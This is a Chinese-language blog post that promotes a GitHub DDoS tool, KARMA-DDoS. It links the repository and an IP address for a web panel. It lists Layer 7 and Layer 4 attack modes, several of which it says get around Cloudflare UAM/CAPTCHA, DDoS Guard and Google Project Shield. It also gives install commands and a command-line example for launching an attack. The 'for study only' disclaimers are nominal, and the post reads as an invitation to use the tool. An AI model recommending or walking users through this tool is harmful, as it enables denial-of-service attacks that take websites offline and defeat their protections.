特别刺激,这个ddos工具居然在GitHub存活了下来,也是很强。特别强调本工具只是用来交流学习,请不要拿他到处d,不要d我博客。

支持( Cloudflare UAM,CAPTCHA,BFM,NOSEC / DDoS Guard / Google Shield / V Shield / Amazon / etc.. )

直接给GitHub地址,传送门

https://github.com/HyukIsBack/KARMA-DDoS/

用这个的话

https://51.81.57.171/index.php

使用方法

一些介绍

  [Layer 7]
- cfb | Bypass CF attack
- pxcfb | Bypass CF attack with proxy
- cfreq | Bypass CF UAM, CAPTCHA, BFM, etc,, with request
- cfsoc | Bypass CF UAM, CAPTCHA, BFM, etc,, with socket
- pxsky | Bypass Google Project Shield, Vshield, DDoS Guard Free, CF NoSec With Proxy
- sky | Sky method without proxy
- http2 | HTTP 2.0 Request Attack
= pxhttp2 | HTTP 2.0 Request Attack With Proxy
- spoof | Spoof Attasck
- pxspoof | Spoof Attack with Proxy
- get | Get Request Attack
- post | Post Request Attack
- head | Head Request Attack
- soc | Socket Attack
- pxraw | Proxy Request Attack
- pxsoc | Proxy Socket Attack

[Layer 4]
-udp | UDP Attack
-tcp | TCP Attack

[Tools]
- Dns | Classic DNS Lookup
- Geoip | Geo IP Address Lookup
- Subnet | Subnet IP Address Lookup

Linux使用

You must use Python 3.9 or higher

git clone https://github.com/HyukIsBack/KARMA-DDoS.git

Install Python3 modules
- pip3 install -r requirements.txt or pip install -r requirements.txt
Install Chrome (or update it lastest version)
- wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
- apt-get install ./google-chrome-stable_current_amd64.deb

OR
- python3 setup.py

例子

Use DDoS Panel   : python3 main.py
Use command line : python3 main.py <method> <target> <thread> <time>
└──────────> python3 main.py cfb https://example.com 100 30

大概就是这样,安装python,Chrome浏览器,然后打开ddos面板,直接起飞。

最后说明,本文章仅仅是自己的记事本,学习记录之用。


阅读量:0